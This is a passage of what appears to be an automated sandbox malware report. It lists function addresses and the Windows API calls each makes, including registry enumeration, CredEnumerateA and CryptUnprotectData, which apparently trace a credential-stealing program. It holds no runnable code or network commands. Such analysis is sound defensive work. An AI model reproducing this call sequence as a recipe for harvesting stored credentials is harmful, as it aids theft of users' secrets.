9825->9826 9827 40eb94 9826->9827 9827->8854 9829 408c55 9828->9829 11457 408c21 9829->11457 9832 408c21 49 API calls 9833 408c6c 9832->9833 9834 408c21 49 API calls 9833->9834 9835 408c76 9834->9835 9836 401d71 6 API calls 9835->9836 9837 408c8d 9836->9837 9838 408c91 9837->9838 9839 408ca5 9837->9839 11464 408961 9838->11464 9840 401d71 6 API calls 9839->9840 9842 408cbc 9840->9842 9844 408cc0 9842->9844 9845 408cd4 9842->9845 9847 408961 38 API calls 9844->9847 9848 401d71 6 API calls 9845->9848 9846 4018b8 LocalFree 9846->9839 9849 408ccf 9847->9849 9850 408ce7 9848->9850 9862 4053d6 9861->9862 9863 4053e4 StrStrIA 9862->9863 9864 40541f 9862->9864 9866 40242b 9 API calls 9862->9866 9873 4018b8 LocalFree 9862->9873 11626 4051e3 9862->11626 9863->9862 11592 40531a 9864->11592 9866->9862 9868 40531a 34 API calls 9869 405433 9868->9869 9871 40531a 34 API calls 9869->9871 9872 40543d 9871->9872 9874 40531a 34 API calls 9872->9874 9873->9862 9875 405447 9874->9875 11621 405199 9875->11621 9878 405199 6 API calls 9879 405461 9878->9879 9889 40a1d4 9888->9889 9890 401d71 6 API calls 9889->9890 9891 40a1ea 9890->9891 9892 40242b 9 API calls 9891->9892 9894 40a20d 9891->9894 9893 40a1f4 9892->9893 9895 404351 41 API calls 9893->9895 9894->8854 9896 40a208 9895->9896 9897 4018b8 LocalFree 9896->9897 9897->9894 9899 40f752 9898->9899 11653 40f30d RegOpenKeyA 9899->11653 9902 401df8 5 API calls 9903 40f77f 9902->9903 11663 40f3ac RegOpenKeyA 9903->11663 9906 4018b8 LocalFree 9907 40f799 9906->9907 9908 401d71 6 API calls 9907->9908 9910 40f7af 9908->9910 9909 40f7d3 9912 40f30d 23 API calls 9909->9912 9910->9909 9911 401e4c 6 API calls 9910->9911 9913 40f7be 9911->9913 9914 40f7e6 9912->9914 9916 40f30d 23 API calls 9913->9916 9915 40f3ac 26 API calls 9914->9915 9917 40f7fb 9915->9917 9918 40f7ce 9916->9918 9919 40f3ac 26 API calls 9917->9919 9920 4018b8 LocalFree 9918->9920 9920->9909 9922->8953 9923->8961 9937 40c107 9924->9937 9927 40c107 46 API calls 9928 40c16e 9927->9928 9929 40c107 46 API calls 9928->9929 9930 40c185 9929->9930 9931 40c107 46 API calls 9930->9931 9932 40c19c 9931->9932 9933 40c107 46 API calls 9932->9933 9934 40c1b3 9933->9934 9946 401eb1 9937->9946 9940 40c139 9940->9927 9941 401e4c 6 API calls 9942 40c11f 9941->9942 9955 4041a6 9942->9955 9945 4018b8 LocalFree 9945->9940 9979 4018cf LocalAlloc 9946->9979 9948 401ec2 9949 401ed0 SHGetFolderPathA 9948->9949 9950 401ece 9948->9950 9949->9950 9954 401f21 9949->9954 9951 4018b8 LocalFree 9950->9951 9952 401eee 9951->9952 9952->9954 9980 401d71 9952->9980 9954->9940 9954->9941 9956 4041c5 9955->9956 9958 4041c0 9955->9958 9957 4018b8 LocalFree 9956->9957 9959 40434d 9957->9959 9958->9956 9960 4041e5 9958->9960 9961 4041d6 9958->9961 9959->9945 9963 401df8 5 API calls 9960->9963 9962 401df8 5 API calls 9961->9962 9964 4041e3 9962->9964 9963->9964 9965 404209 FindFirstFileA 9964->9965 9965->9956 9970 404228 9965->9970 9979->9948 9981 401d7d 9980->9981 9984 401c8d 9981->9984 9985 401c9b RegOpenKeyExA 9984->9985 9987 401d4a 9985->9987 9988 401cdb RegQueryValueExA 9985->9988 9990 401d6c 9987->9990 9992 401c8d 2 API calls 9987->9992 9989 401d42 RegCloseKey 9988->9989 9991 401cf6 9988->9991 9989->9987 9990->9952 9991->9989 9998 4018cf LocalAlloc 9991->9998 9992->9990 9994 401d12 RegQueryValueExA 9995 401d32 9994->9995 9996 401d2c 9994->9996 9995->9989 9998->9994 10206 40eeaa 10205->10206 10213 40ebc3 10205->10213 10206->8988 10207 40ebca RegEnumKeyExA 10208 40ebf3 RegCloseKey 10207->10208 10207->10213 10208->10206 10210 401df8 5 API calls 10210->10213 10211 401e4c 6 API calls 10211->10213 10212 401d71 6 API calls 10212->10213 10213->10207 10213->10210 10213->10211 10213->10212 10214 40eba3 15 API calls 10213->10214 10215 4015cb lstrlen 10213->10215 10216 4018b8 LocalFree 10213->10216 10214->10213 10215->10213 10216->10213 10222 40a892 10217->10222 10218 40a944 10219 40a712 17 API calls 10218->10219 10220 40a969 10219->10220 10224 40a96d 10220->10224 10221 40a8fc StrStrIW 10221->10222 10222->10218 10222->10221 10233 40a712 lstrlenW 10222->10233 10225 40a97d 10224->10225 10226 40aaa3 10225->10226 10227 40a9c2 CredEnumerateA 10225->10227 10226->8994 10227->10226 10230 40a9ed 10227->10230 10228 40aa9a CredFree 10228->10226 10229 40aa09 lstrlenW CryptUnprotectData 10229->10230 10230->10226 10230->10228 10230->10229 10231 40aa7c LocalFree 10230->10231 10259 40a522 10230->10259 10231->10230 10234 40a725 10233->10234 10235 40a72a 10233->10235 10234->10222 10236 40a788 wsprintfA 10235->10236 10237 40a75b wsprintfA 10235->10237 10238 401e4c 6 API calls 10236->10238 10239 401e4c 6 API calls 10237->10239 10240 40a7af 10238->10240 10239->10235 10241 401d71 6 API calls 10240->10241 10242 40a7c9 10241->10242 10243 40a868 10242->10243 10245 40a860 10242->10245 10246 40a7de lstrlenW 10242->10246 10244 4018b8 LocalFree 10243->10244 10247 40a870 10244->10247 10249 4018b8 LocalFree 10245->10249 10246->10245 10248 40a810 CryptUnprotectData 10246->10248 10247->10222 10248->10245 10250 40a82e 10248->10250 10249->10243 10250->10245 10253 40a4e9 10250->10253 10257 401569 10253->10257 10255 40a4f7 lstrlenW 10256 40a510 10255->10256 10258 40157a 10257->10258 10258->10255 10260 401569 10259->10260 10261 40a530 lstrlen 10260->10261 10262 40a545 10261->10262 10262->10231 10270 40436b 10263->10270 10266 40436b 46 API calls 10267 4043c5 10266->10267 10268 40436b 46 API calls 10267->10268 10269 4043d8 10268->10269 10269->8999 10271 401eb1 7 API calls 10270->10271 10272 404376 10271->10272 10273 404398 10272->10273 10274 401e4c 6 API calls 10272->10274 10273->10266 10275 404383 10274->10275 10279 404351 10275->10279 10278 4018b8 LocalFree 10278->10273 10280 4041a6 41 API calls 10279->10280 10281 404367 10280->10281 10281->10278 10283 408120 10282->10283 10289 407f2c 10282->10289 10283->9004 10284 407f33 RegEnumKeyExA 10285 407f5c RegCloseKey 10284->10285 10284->10289 10285->10283 10287 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10287->10289 10288 401d71 6 API calls 10288->10289 10289->10284 10289->10287 10289->10288 10290 4018b8 LocalFree 10289->10290 10291 4015cb lstrlen 10289->10291 10292 407f0c 11 API calls 10289->10292 10290->10289 10291->10289 10292->10289 10294 401df8 5 API calls 10293->10294 10295 40243a lstrlen 10294->10295 10296 402458 StrStrIA 10295->10296 10299 402449 10295->10299 10297 402467 10296->10297 10298 40246b StrRChrIA 10296->10298 10297->10298 10300 402479 lstrlen 10298->10300 10299->10296 10302 40248c 10300->10302 10302->9013 10304 4015d4 lstrlen 10303->10304 10305 4015de 10303->10305 10304->10305 10305->9030 10307 401eb1 7 API calls 10306->10307 10308 40d970 10307->10308 10309 40d99d 10308->10309 10310 401e4c 6 API calls 10308->10310 10309->9054 10311 40d97f 10310->10311 10312 4041a6 41 API calls 10311->10312 10313 40d998 10312->10313 10314 4018b8 LocalFree 10313->10314 10314->10309 10316 407e1c 10315->10316 10322 407bda 10315->10322 10316->9068 10317 407be1 RegEnumKeyExA 10318 407c0a RegCloseKey 10317->10318 10317->10322 10318->10316 10320 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10320->10322 10321 401d71 6 API calls 10321->10322 10322->10317 10322->10320 10322->10321 10323 4015cb lstrlen 10322->10323 10324 4018b8 LocalFree 10322->10324 10325 407bba 11 API calls 10322->10325 10323->10322 10324->10322 10325->10322 10327 4015fb 10326->10327 10327->9072 10329 409c51 10328->10329 10330 409ca8 10328->10330 10332 401d71 6 API calls 10329->10332 10359 4018cf LocalAlloc 10330->10359 10334 409c63 10332->10334 10333 409cb2 RegOpenKeyA 10335 409d38 10333->10335 10357 409cc8 10333->10357 10334->10330 10337 40242b 9 API calls 10334->10337 10336 4018b8 LocalFree 10335->10336 10339 409d40 10336->10339 10340 409c6e 10337->10340 10338 409ccf RegEnumKeyExA 10341 409cf4 RegCloseKey 10338->10341 10338->10357 10339->9075 10342 409ca3 10340->10342 10345 401eb1 7 API calls 10340->10345 10341->10335 10346 4018b8 LocalFree 10342->10346 10344 401df8 5 API calls 10344->10357 10347 409c7c 10345->10347 10346->10330 10349 409c9b 10347->10349 10350 401e4c 6 API calls 10347->10350 10348 401e4c 6 API calls 10348->10357 10352 4018b8 LocalFree 10349->10352 10353 409c89 10350->10353 10351 409c3c 79 API calls 10351->10357 10352->10342 10360 409ac1 10353->10360 10355 4018b8 LocalFree 10355->10357 10357->10338 10357->10344 10357->10348 10357->10351 10357->10355 10359->10333 10399 401f7e 10360->10399 10362 409ad0 10400 401f88 10399->10400 10401 401f8d 10399->10401 10400->10401 10402 401f96 GetFileAttributesA 10400->10402 10401->10362 10543 401eb1 7 API calls 10542->10543 10544 408fde 10543->10544 10545 40901b 10544->10545 10546 401e4c 6 API calls 10544->10546 10545->9086 10547 408fed 10546->10547 10548 404351 41 API calls 10547->10548 10549 409002 10548->10549 10550 404351 41 API calls 10549->10550 10551 409016 10550->10551 10552 4018b8 LocalFree 10551->10552 10552->10545 10554 40cd66 10553->10554 10555 40ccea 10553->10555 10554->9102 10555->10554 10556 40ccfc CredEnumerateA 10555->10556 10556->10554 10557 40cd23 10556->10557 10557->10554 10558 40cd5d CredFree 10557->10558 10560 40cc29 10557->10560 10558->10554 10561 40cc3c 10560->10561 10562 4015cb lstrlen 10561->10562 10563 40cc47 10562->10563 10564 4015cb lstrlen 10563->10564 10565 40cc52 10564->10565 10566 40cc60 StrStrIA 10565->10566 10567 40cc71 lstrlen StrStrIA 10566->10567 10572 40ccbd 10566->10572 10568 40cc8f 10567->10568 10569 4037c6 2 API calls 10568->10569 10570 40cc9d 10569->10570 10571 4015cb lstrlen 10570->10571 10570->10572 10571->10572 10572->10557 10574 40de97 10573->10574 10581 40dc82 10573->10581 10574->9112 10575 40dc89 RegEnumKeyExA 10576 40dcb2 RegCloseKey 10575->10576 10575->10581 10576->10574 10578 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10578->10581 10579 401d71 6 API calls 10579->10581 10580 40dc62 11 API calls 10580->10581 10581->10575 10581->10578 10581->10579 10581->10580 10582 4018b8 LocalFree 10581->10582 10583 4015cb lstrlen 10581->10583 10582->10581 10583->10581 10585 401d71 6 API calls 10584->10585 10586 40e878 10585->10586 10587 40e897 10586->10587 10591 40e811 10586->10591 10587->9117 10590 4018b8 LocalFree 10590->10587 10598 40e7db 10591->10598 10594 40e7db 46 API calls 10595 40e842 10594->10595 10596 40e7db 46 API calls 10595->10596 10597 40e859 10596->10597 10597->10590 10599 401eb1 7 API calls 10598->10599 10600 40e7e6 10599->10600 10601 40e80d 10600->10601 10602 401e4c 6 API calls 10600->10602 10601->10594 10603 40e7f3 10602->10603 10604 4041a6 41 API calls 10603->10604 10605 40e808 10604->10605 10606 4018b8 LocalFree 10605->10606 10606->10601 10608 40d792 10607->10608 10617 40d5e3 10607->10617 10608->9121 10609 40d5ea RegEnumKeyExA 10610 40d613 RegCloseKey 10609->10610 10609->10617 10610->10608 10611 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10611->10617 10613 401d71 6 API calls 10613->10617 10614 40d5c0 11 API calls 10614->10617 10615 4015cb lstrlen 10615->10617 10616 4018b8 LocalFree 10616->10617 10617->10609 10617->10611 10617->10613 10617->10614 10617->10615 10617->10616 10619 406911 10618->10619 10628 4066b2 10618->10628 10619->9144 10620 4066b9 RegEnumKeyExA 10621 4066e2 RegCloseKey 10620->10621 10620->10628 10621->10619 10623 401df8 5 API calls 10623->10628 10624 401e4c 6 API calls 10624->10628 10625 401d71 6 API calls 10625->10628 10627 4018b8 LocalFree 10627->10628 10628->10620 10628->10623 10628->10624 10628->10625 10628->10627 10629 4015cb lstrlen 10628->10629 10630 4043dc 10628->10630 10629->10628 10631 404461 10630->10631 10632 404405 10630->10632 10631->10628 10632->10631 10633 404422 CryptUnprotectData 10632->10633 10633->10631 10635 404432 10633->10635 10634 404459 LocalFree 10634->10631 10635->10631 10635->10634 10637 404a91 10636->10637 10645 40493e 10636->10645 10637->9150 10638 404945 RegEnumKeyExA 10639 40496e RegCloseKey 10638->10639 10638->10645 10639->10637 10641 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10641->10645 10642 401d71 6 API calls 10642->10645 10643 4018b8 LocalFree 10643->10645 10644 4015cb lstrlen 10644->10645 10645->10638 10645->10641 10645->10642 10645->10643 10645->10644 10646 40491b 11 API calls 10645->10646 10646->10645 10648 404917 10647->10648 10654 404830 10647->10654 10648->9156 10649 404837 RegEnumValueA 10650 404865 RegCloseKey 10649->10650 10649->10654 10650->10648 10652 404881 StrStrIA 10652->10654 10653 401d71 6 API calls 10653->10654 10654->10649 10654->10652 10654->10653 10655 4018b8 LocalFree 10654->10655 10655->10654 10657 401d71 6 API calls 10656->10657 10658 40ef86 10657->10658 10659 40efa0 10658->10659 10684 40eef7 10658->10684 10660 401d71 6 API calls 10659->10660 10662 40efb4 10660->10662 10664 40efce 10662->10664 10666 40eef7 41 API calls 10662->10666 10667 401d71 6 API calls 10664->10667 10668 40efc6 10666->10668 10685 404351 41 API calls 10684->10685 10686 40ef12 10685->10686 10687 404351 41 API calls 10686->10687 10688 40ef27 10687->10688 10698 40b00e 10697->10698 10707 40aefa 10697->10707 10698->9181 10699 40af01 RegEnumKeyExA 10700 40af2a RegCloseKey 10699->10700 10699->10707 10700->10698 10702 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10702->10707 10703 401d71 6 API calls 10703->10707 10704 4018b8 LocalFree 10704->10707 10705 40aed7 21 API calls 10705->10707 10707->10699 10707->10702 10707->10703 10707->10704 10707->10705 10708 40ac3e 10707->10708 10771 4018cf LocalAlloc 10708->10771 10710 40ac4e 10772 4018cf LocalAlloc 10710->10772 10712 40ac5b 10773 4018cf LocalAlloc 10712->10773 10714 40ac68 10774 4018cf LocalAlloc 10714->10774 10716 40ac75 10775 4018cf LocalAlloc 10716->10775 10718 40ac82 10776 4018cf LocalAlloc 10718->10776 10720 40ac8f 10777 4018cf LocalAlloc 10720->10777 10722 40ac9c 7 API calls 10771->10710 10772->10712 10773->10714 10774->10716 10775->10718 10776->10720 10777->10722 10786 407585 10785->10786 10793 4073c7 10785->10793 10786->9204 10787 4073ce RegEnumKeyExA 10788 4073f7 RegCloseKey 10787->10788 10787->10793 10788->10786 10790 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10790->10793 10791 401d71 6 API calls 10791->10793 10792 4018b8 LocalFree 10792->10793 10793->10787 10793->10790 10793->10791 10793->10792 10794 4015cb lstrlen 10793->10794 10795 4073a7 11 API calls 10793->10795 10794->10793 10795->10793 10797 406f3f 10796->10797 10805 406d72 10796->10805 10797->9244 10798 406d79 RegEnumKeyExA 10799 406da2 RegCloseKey 10798->10799 10798->10805 10799->10797 10801 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10801->10805 10802 401d71 6 API calls 10802->10805 10803 4018b8 LocalFree 10803->10805 10804 4043dc 2 API calls 10804->10805 10805->10798 10805->10801 10805->10802 10805->10803 10805->10804 10806 4015cb lstrlen 10805->10806 10806->10805 10808 401f36 2 API calls 10807->10808 10809 406fca 10808->10809 10810 406fd3 10809->10810 10811 406fce 10809->10811 10812 401ffd 7 API calls 10810->10812 10811->9268 10834 407681 10833->10834 10840 4075f2 10833->10840 10834->9286 10835 4075f9 RegEnumValueA 10836 407622 RegCloseKey 10835->10836 10835->10840 10836->10834 10838 401d71 6 API calls 10838->10840 10839 4018b8 LocalFree 10839->10840 10840->10835 10840->10838 10840->10839 10842 401d71 6 API calls 10841->10842 10843 405ea5 10842->10843 10844 405ebe 10843->10844 10846 404351 41 API calls 10843->10846 10845 401d71 6 API calls 10844->10845 10848 405ed4 10845->10848 10847 405eb9 10846->10847 10849 4018b8 LocalFree 10847->10849 10850 405eed 10848->10850 10851 404351 41 API calls 10848->10851 10849->10844 10852 40439c 46 API calls 10850->10852 10853 405ee8 10851->10853 10854 405f00 10852->10854 10855 4018b8 LocalFree 10853->10855 10854->9296 10855->10850 10857 401eb1 7 API calls 10856->10857 10858 407a3e 10857->10858 10859 407a7b 10858->10859 10860 401e4c 6 API calls 10858->10860 10859->9314 10861 407a4d 10860->10861 10862 404351 41 API calls 10861->10862 10863 407a62 10862->10863 10864 404351 41 API calls 10863->10864 10865 407a76 10864->10865 10866 4018b8 LocalFree 10865->10866 10866->10859 10868 407a2f 10867->10868 10873 4078e8 10867->10873 10868->9324 10869 4078ef RegEnumKeyExA 10870 407918 RegCloseKey 10869->10870 10869->10873 10870->10868 10872 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10872->10873 10873->10869 10873->10872 10874 401d71 6 API calls 10873->10874 10875 404351 41 API calls 10873->10875 10876 4018b8 LocalFree 10873->10876 10877 4078c8 45 API calls 10873->10877 10874->10873 10875->10873 10876->10873 10877->10873 10879 4044c8 10878->10879 10880 40448a GetProcAddress 10878->10880 10879->9339 10880->10879 10881 404499 GetProcAddress 10880->10881 10881->10879 10882 4044aa GetCurrentProcess 10881->10882 10883 4044b8 10882->10883 10883->9339 10883->10879 10884->9341 10886 4015ad 10885->10886 10886->9343 10888 4044e1 10887->10888 10889 4044f3 10887->10889 10888->10889 10890 4044fa AllocateAndInitializeSid 10888->10890 10889->9346 10891 40453b 10890->10891 10892 40453d CheckTokenMembership 10890->10892 10891->9346 10893 404557 10892->10893 10894 40455e FreeSid 10892->10894 10893->10894 10894->9346 10896 4027f7 17 API calls 10895->10896 10897 404580 10896->10897 10926 401eb1 7 API calls 10925->10926 10928 40c68a 10926->10928 10927 40c6b7 10930 401eb1 7 API calls 10927->10930 10928->10927 10929 401e4c 6 API calls 10928->10929 10931 40c699 10929->10931 10932 40c6bf 10930->10932 10933 4041a6 41 API calls 10931->10933 10934 40c6ec 10932->10934 10935 401e4c 6 API calls 10932->10935 10936 40c6b2 10933->10936 10934->9378 10937 40c6ce 10935->10937 10938 4018b8 LocalFree 10936->10938 10939 4041a6 41 API calls 10937->10939 10938->10927 10940 40c6e7 10939->10940 10941 4018b8 LocalFree 10940->10941 10941->10934 10943 401d71 6 API calls 10942->10943 10944 4054de 10943->10944 10945 40553e 10944->10945 10946 401df8 5 API calls 10944->10946 10945->9390 10947 4054f2 10946->10947 10970 4054a5 10947->10970 10950 401df8 5 API calls 10951 40550d 10950->10951 10952 4054a5 16 API calls 10951->10952 10953 40551b 10952->10953 10954 401df8 5 API calls 10953->10954 10955 405528 10954->10955 10956 4054a5 16 API calls 10955->10956 10957 405536 10956->10957 10958 4018b8 LocalFree 10957->10958 10958->10945 10971 4054c4 10970->10971 10972 4054ae 10970->10972 10971->10950 10973 40406c 16 API calls 10972->10973 10974 4054bc 10973->10974 10975 4018b8 LocalFree 10974->10975 10975->10971 10990 401eb1 7 API calls 10989->10990 10991 40c73d 10990->10991 10992 40c765 10991->10992 10993 401e4c 6 API calls 10991->10993 10992->9434 10994 40c74c 10993->10994 10995 404351 41 API calls 10994->10995 10996 40c760 10995->10996 10997 4018b8 LocalFree 10996->10997 10997->10992 10999 406cdf 10998->10999 11006 406b3e 10998->11006 10999->9451 11000 406b45 RegEnumKeyExA 11001 406b6e RegCloseKey 11000->11001 11000->11006 11001->10999 11003 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11003->11006 11004 4018b8 LocalFree 11004->11006 11005 401d71 6 API calls 11005->11006 11006->11000 11006->11003 11006->11004 11006->11005 11007 4015cb lstrlen 11006->11007 11007->11006 11009 40735a 11008->11009 11015 40719c 11008->11015 11009->9470 11010 4071a3 RegEnumKeyExA 11011 4071cc RegCloseKey 11010->11011 11010->11015 11011->11009 11013 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11013->11015 11014 401d71 6 API calls 11014->11015 11015->11010 11015->11013 11015->11014 11016 4018b8 LocalFree 11015->11016 11017 4015cb lstrlen 11015->11017 11018 40717c 11 API calls 11015->11018 11016->11015 11017->11015 11018->11015 11020 40665a 11019->11020 11027 406420 11019->11027 11020->9475 11021 406427 RegEnumKeyExA 11022 406450 RegCloseKey 11021->11022 11021->11027 11022->11020 11023 401df8 5 API calls 11023->11027 11025 401e4c 6 API calls 11025->11027 11026 401d71 6 API calls 11026->11027 11027->11021 11027->11023 11027->11025 11027->11026 11028 4018b8 LocalFree 11027->11028 11029 4015cb lstrlen 11027->11029 11028->11027 11029->11027 11031 40dbda 11030->11031 11040 40da1a 11030->11040 11031->9480 11032 40da21 RegEnumKeyExA 11033 40da4a RegCloseKey 11032->11033 11032->11040 11033->11031 11035 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11035->11040 11036 401d71 6 API calls 11036->11040 11037 40d9fa 11 API calls 11037->11040 11038 4018b8 LocalFree 11038->11040 11039 4015cb lstrlen 11039->11040 11040->11032 11040->11035 11040->11036 11040->11037 11040->11038 11040->11039 11042 40d2c7 11041->11042 11050 40d092 11041->11050 11042->9498 11043 40d099 RegEnumKeyExA 11044 40d0c2 RegCloseKey 11043->11044 11043->11050 11044->11042 11046 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11046->11050 11047 401d71 6 API calls 11047->11050 11048 4043dc 2 API calls 11048->11050 11049 4018b8 LocalFree 11049->11050 11050->11043 11050->11046 11050->11047 11050->11048 11050->11049 11051 40d072 13 API calls 11050->11051 11052 4015cb lstrlen 11050->11052 11051->11050 11052->11050 11054 401d71 6 API calls 11053->11054 11061 40d2e7 11054->11061 11055 40d356 11055->9502 11056 40d351 11057 4018b8 LocalFree 11056->11057 11057->11055 11058 40d309 wsprintfA 11059 401d71 6 API calls 11058->11059 11059->11061 11060 40406c 16 API calls 11060->11061 11061->11055 11061->11056 11061->11058 11061->11060 11062 4018b8 LocalFree 11061->11062 11062->11061 11064 401eb1 7 API calls 11063->11064 11065 4076fe 11064->11065 11066 407750 11065->11066 11067 401e4c 6 API calls 11065->11067 11066->9537 11068 40770d 11067->11068 11069 404351 41 API calls 11068->11069 11070 407723 11069->11070 11071 404351 41 API calls 11070->11071 11072 407737 11071->11072 11073 404351 41 API calls 11072->11073 11074 40774b 11073->11074 11075 4018b8 LocalFree 11074->11075 11075->11066 11077 401eb1 7 API calls 11076->11077 11078 4077a4 11077->11078 11079 40784f 11078->11079 11080 4077c0 11078->11080 11081 401e4c 6 API calls 11078->11081 11079->9545 11082 401df8 5 API calls 11080->11082 11081->11080 11083 4077d0 11082->11083 11084 40406c 16 API calls 11083->11084 11085 4077df 11084->11085 11086 4018b8 LocalFree 11085->11086 11087 4077e4 11086->11087 11088 401df8 5 API calls 11087->11088 11089 4077f1 11088->11089 11090 40406c 16 API calls 11089->11090 11091 407800 11090->11091 11092 4018b8 LocalFree 11091->11092 11093 407805 11092->11093 11107->9566 11109 404c4d 11108->11109 11111 404b2b 11108->11111 11109->9571 11110 404b44 11113 401d71 6 API calls 11110->11113 11111->11110 11112 401e4c 6 API calls 11111->11112 11112->11110 11114 404b5e 11113->11114 11115 404b80 11114->11115 11116 401df8 5 API calls 11114->11116 11117 401d71 6 API calls 11115->11117 11118 404b6c 11116->11118 11119 404b96 11117->11119 11121 404b07 16 API calls 11118->11121 11120 404bb8 11119->11120 11122 401df8 5 API calls 11119->11122 11123 401d71 6 API calls 11120->11123 11124 404b76 11121->11124 11125 404ba4 11122->11125 11126 404bcf 11123->11126 11127 4018b8 LocalFree 11124->11127 11128 404b07 16 API calls 11125->11128 11129 404bf1 11126->11129 11133 401df8 5 API calls 11126->11133 11130 404b7b 11127->11130 11131 404bae 11128->11131 11134 4018b8 LocalFree 11130->11134 11134->11115 11164 408e09 11163->11164 11165 408d3e 11163->11165 11164->9641 11166 408d45 RegEnumKeyExA 11165->11166 11169 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11165->11169 11170 4018b8 LocalFree 11165->11170 11171 401d71 6 API calls 11165->11171 11173 408d1e 11 API calls 11165->11173 11189 404043 11165->11189 11166->11165 11167 408d6e RegCloseKey 11166->11167 11167->11164 11169->11165 11170->11165 11171->11165 11173->11165 11175 408f4b 11174->11175 11182 408e2d 11174->11182 11175->9645 11176 408e34 RegEnumKeyExA 11177 408e5d RegCloseKey 11176->11177 11176->11182 11177->11175 11179 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11179->11182 11180 401d71 6 API calls 11180->11182 11181 40242b 9 API calls 11181->11182 11182->11176 11182->11179 11182->11180 11182->11181 11184 4018b8 LocalFree 11182->11184 11185 408e0d 50 API calls 11182->11185 11188 408eb1 11182->11188 11183 401f7e GetFileAttributesA 11183->11188 11184->11182 11185->11182 11186 404351 41 API calls 11186->11188 11187 4018b8 LocalFree 11187->11182 11188->11183 11188->11186 11188->11187 11190 404068 11189->11190 11191 40404c 11189->11191 11190->11165 11191->11190 11192 4015cb lstrlen 11191->11192 11192->11190 11194 40e575 11193->11194 11195 40e579 11193->11195 11194->9650 11204 4018cf LocalAlloc 11195->11204 11197 40e583 lstrlen 11199 40e5c2 11197->11199 11200 40e5ad 11197->11200 11202 4018b8 LocalFree 11199->11202 11201 404351 41 API calls 11200->11201 11201->11199 11203 40e5ca 11202->11203 11203->9650 11204->11197 11206 4063c8 11205->11206 11214 406207 11205->11214 11206->9666 11207 40620e RegEnumKeyExA 11208 406237 RegCloseKey 11207->11208 11207->11214 11208->11206 11210 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11210->11214 11211 401d71 6 API calls 11211->11214 11212 4018b8 LocalFree 11212->11214 11213 4015cb lstrlen 11213->11214 11214->11207 11214->11210 11214->11211 11214->11212 11214->11213 11215 4061e4 11 API calls 11214->11215 11215->11214 11217 406147 11216->11217 11223 405f6f 11216->11223 11217->9677 11218 405f76 RegEnumKeyExA 11219 405f9f RegCloseKey 11218->11219 11218->11223 11219->11217 11220 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11220->11223 11222 401d71 6 API calls 11222->11223 11223->11218 11223->11220 11223->11222 11224 4018b8 LocalFree 11223->11224 11225 4015cb lstrlen 11223->11225 11224->11223 11225->11223 11271 405844 11226->11271 11272 401d71 6 API calls 11271->11272 11273 40585d 11272->11273 11274 401d71 6 API calls 11273->11274 11275 405873 11274->11275 11276 401d71 6 API calls 11275->11276 11277 405889 11276->11277 11278 401d71 6 API calls 11277->11278 11279 4058a1 11278->11279 11280 401d71 6 API calls 11279->11280 11281 4058b7 11280->11281 11282 401d71 6 API calls 11281->11282 11285 4058cf 11282->11285 11283 4018b8 LocalFree 11284 405978 11283->11284 11289 4015cb lstrlen 11285->11289 11305 40594b 11285->11305 11290 405906 11289->11290 11305->11283 11307 404e92 11306->11307 11310 404e8d 11306->11310 11308 4018b8 LocalFree 11307->11308 11309 404ffb 11308->11309 11309->9738 11310->11307 11311 404eb2 11310->11311 11312 404ea3 11310->11312 11314 401df8 5 API calls 11311->11314 11313 401df8 5 API calls 11312->11313 11315 404eb0 11313->11315 11314->11315 11316 404ed6 FindFirstFileA 11315->11316 11316->11307 11327 404ef5 11316->11327 11317 404f03 lstrcmpiA 11320 404f1a lstrcmpiA 11317->11320 11326 404f15 11317->11326 11318 404f68 StrStrIA 11319 404fcb FindNextFileA 11318->11319 11318->11327 11321 404fe5 FindClose 11319->11321 11319->11327 11320->11326 11321->11307 11322 401df8 5 API calls 11322->11327 11323 401df8 5 API calls 11323->11326 11324 401e4c 6 API calls 11324->11327 11325 401e4c 6 API calls 11325->11326 11326->11319 11326->11323 11326->11325 11329 404e73 24 API calls 11326->11329 11333 4018b8 LocalFree 11326->11333 11327->11317 11327->11318 11327->11322 11327->11324 11328 404fa6 StrStrIA 11327->11328 11330 404fbd 11327->11330 11328->11327 11329->11326 11332 4018b8 LocalFree 11330->11332 11345 404e5c 11330->11345 11332->11319 11333->11326 11335 401eb1 7 API calls 11334->11335 11336 405014 11335->11336 11337 401df8 5 API calls 11336->11337 11344 40502f 11336->11344 11339 405026 11337->11339 11338 404e73 31 API calls 11340 40503f 11338->11340 11342 4018b8 LocalFree 11339->11342 11341 4018b8 LocalFree 11340->11341 11343 405047 11341->11343 11342->11344 11343->9733 11344->11338 11346 40406c 16 API calls 11345->11346 11358 404351 41 API calls 11357->11358 11359 405c84 11358->11359 11360 404351 41 API calls 11359->11360 11361 405c99 11360->11361 11361->9777 11363 40e254 11362->11363 11364 40e37c 11362->11364 11365 401d71 6 API calls 11363->11365 11364->9798 11366 40e266 11365->11366 11367 401d71 6 API calls 11366->11367 11368 40e27b 11367->11368 11369 401d71 6 API calls 11368->11369 11370 40e292 11369->11370 11371 401d71 6 API calls 11370->11371 11372 40e2a7 11371->11372 11373 401d71 6 API calls 11372->11373 11376 40e2bc 11373->11376 11374 40e34c 11375 4018b8 LocalFree 11374->11375 11377 40e354 11375->11377 11376->11374 11380 4043dc 2 API calls 11376->11380 11378 4018b8 LocalFree 11377->11378 11386 40e2ef 11380->11386 11386->11374 11388 4015cb lstrlen 11386->11388 11389 40e31d 11388->11389 11396 40e445 11395->11396 11400 40e3a0 11395->11400 11396->9802 11397 40e3a7 RegEnumValueA 11398 40e3d5 RegCloseKey 11397->11398 11397->11400 11398->11396 11400->11397 11401 401d71 6 API calls 11400->11401 11402 40e402 StrStrIA 11400->11402 